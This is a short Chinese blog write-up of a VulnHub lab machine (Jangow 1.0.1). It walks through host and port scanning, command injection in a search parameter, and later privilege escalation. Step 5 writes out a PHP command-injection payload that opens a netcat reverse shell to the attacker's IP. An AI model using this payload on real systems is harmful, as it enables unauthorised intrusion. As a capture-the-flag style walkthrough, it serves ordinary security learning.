渗透实战(三)

本文描述了作者通过参与CTF比赛过程中的渗透测试,逐步扫描、发现靶机漏洞,利用HTTP注入获取反弹shell权限的过程。涉及的工具和技术包括ARP扫描、Nmap、uname-a检查和Antique漏洞利用。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

近期比较忙,一直在打CTF,所以博客写的比较简略,各位师傅看看思路就行,有些地方也没写到,不必太在意。

下载地址:https://www.vulnhub.com/entry/jangow-101,754/

攻击机192.168.159.4

靶机192.158.159.5

1.扫描IP地址,得到靶机的IP

arp-scan -l

 2.得到靶机的ip,扫描其端口信息

nmap -A 192.168.159.5

 3.发现80端口还开着http,去浏览器打开

 尝试几次后发现一个可能存在漏洞的地方

 4.尝试输入uname -a 发现可以

5.因此直接在后面写一句话木马

http://192.168.159.5/site/busque.php?buscar=<?php system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.159.4 443 >/tmp/f");?>

 可以看到已经写进去了(端口多试几个,很多常用的都被关了)

6.打开监听端口

nc -lvp 443

7.前端访问shell.php文件,实现反弹shell

8.成功获得权限,查看本机信息和系统版本

 lsb_release-a

9.查看这一版本所存在的漏洞并下载

 Exploit Database - Exploits for Penetration Testers, Researchers, and Ethical Hackers

 10.使用蚁剑进行上传

 11.下载漏洞并执行

 12.成功提权

 

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值